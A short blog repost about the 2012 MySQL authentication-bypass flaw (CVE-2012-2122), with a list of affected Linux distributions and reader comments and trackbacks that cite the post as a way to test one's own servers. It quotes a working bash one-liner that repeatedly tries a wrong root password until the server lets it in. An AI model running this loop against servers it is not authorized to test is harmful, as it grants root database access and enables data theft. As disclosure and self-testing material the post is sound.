REPOST: A Tragically Comedic Security Flaw in MySQL

“In short, if you try to authenticate to a MySQL server affected by this flaw, there is a chance it will accept your password even if the wrong one was supplied. The following one-liner in bash will provide access to an affected MySQL server as the root user account, without actually knowing the password.”

$ for i in `seq 1 1000`; do mysql -u root --password=bad -h 127.0.0.1 2>/dev/null; done
mysql>

The following are confirmed distributions that are vulnerable:

  • Ubuntu Linux 64-bit ( 10.04, 10.10, 11.04, 11.10, 12.04 ) ( via many including @michealc )
  • OpenSuSE 12.1 64-bit MySQL 5.5.23-log ( via @michealc )
  • Debian Unstable 64-bit 5.5.23-2 ( via @derickr )
  • Fedora ( via hexed and confirmed by Red Hat )
  • Arch Linux (unspecified version)

Full details can be found at https://community.rapid7.com/community/metasploit/blog/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql

6 Responses to “REPOST: A Tragically Comedic Security Flaw in MySQL”

  1. Joseph Scott says:

    Of course to exploit this you’d need to allow remote logins to your MySQL server from outside your network (or find a way to get access to the inside), which would be a bad idea in general.

  2. ronald says:

    As you can see from the statistics in the post, there are 100 of thousands of MySQL servers that are accessible most likely to existing poor practices.

  3. [...] If you use your own or third-party binaries, we cannot guarantee that they built properly, and therefore, binaries based on versions 5.5.23 or earlier and 5.1.62 or earlier may be affected by this security vulnerability. You can test if it is, using, for example, the script from this post. [...]

  4. [...] If you built your binaries yourself, you (or your database administrator) can easily test if your installation is vulnerable or not by following the instructions found e.g. here http://ronaldbradford.com/blog/repost-a-tragically-comedic-security-flaw-in-mysql-2012-06-11/. [...]

  5. [...] If you built your binaries yourself, you (or your database administrator) can easily test if your installation is vulnerable or not by following the instructions found e.g. here http://ronaldbradford.com/blog/repost-a-tragically-comedic-security-flaw-in-mysql-2012-06-11/. [...]

  6. [...] If you use your own or third-party binaries, we cannot guarantee that they built properly, and therefore, binaries based on versions 5.5.23 or earlier and 5.1.62 or earlier may be affected by this security vulnerability. You can test if it is, using, for example, the script from this post. [...]